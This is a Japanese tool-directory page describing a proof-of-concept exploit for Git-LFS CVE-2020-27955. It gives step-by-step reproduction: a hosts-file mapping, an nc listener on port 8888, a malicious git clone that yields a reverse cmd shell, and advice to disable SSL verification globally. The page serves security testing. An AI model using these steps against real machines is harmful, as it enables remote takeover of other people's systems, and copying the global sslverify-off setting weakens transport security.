Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2020-27955 — Git-LFS の CVE-2020-27955 に対する概念実証エクスプロイト。悪意のある git clone 操作を介してリモートコード実行を行い、リバースシェルを取得することを実証します。 | Kitploit
ツール/GitHubGitHub/z50913/cve-2020-27955
ペイロード生成脆弱性分析エクスプロイト横移動ペネトレーションテストコマンド&コントロール
GitHubz50913/cve-2020-27955

CVE-2020-27955

Git-LFS の CVE-2020-27955 に対する概念実証エクスプロイト。悪意のある git clone 操作を介してリモートコード実行を行い、リバースシェルを取得することを実証します。

リポジトリを見る
3年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2020-27955 脆弱性の再現

1、Windowsマシンで脆弱性のあるバージョンのGit-LFSをダウンロード

ダウンロードURL:https://github.com/git-for-windows/git/releases/tag/v2.29.2.windows.1

2、Windowsマシンにインストールし、hostsファイルに以下の情報を追加します。10.1.1.5 は nc が 8888 ポートをリッスンするホストです(必要に応じて置き換えてください)

10.1.1.5 abcall.xyz

3、10.1.1.5 ホストで nc がポート 8888 をリッスンするように起動

┌──(root㉿hostname)-[~]

└─# nc

Cmd line: -l -p 8888

4、Windowsマシンの cmd コマンドラインで以下を入力

git clone https://github.com/z50913/CVE-2020-27955.git

5、10.1.1.5 が Windows マシンの cmd シェルを取得

その他

SSL証明書の問題が発生した場合は、以下のコマンドを先に入力して SSL 検証を無効にしてから、再度 clone してください

git config --global http.sslverify false

ツールをダウンロード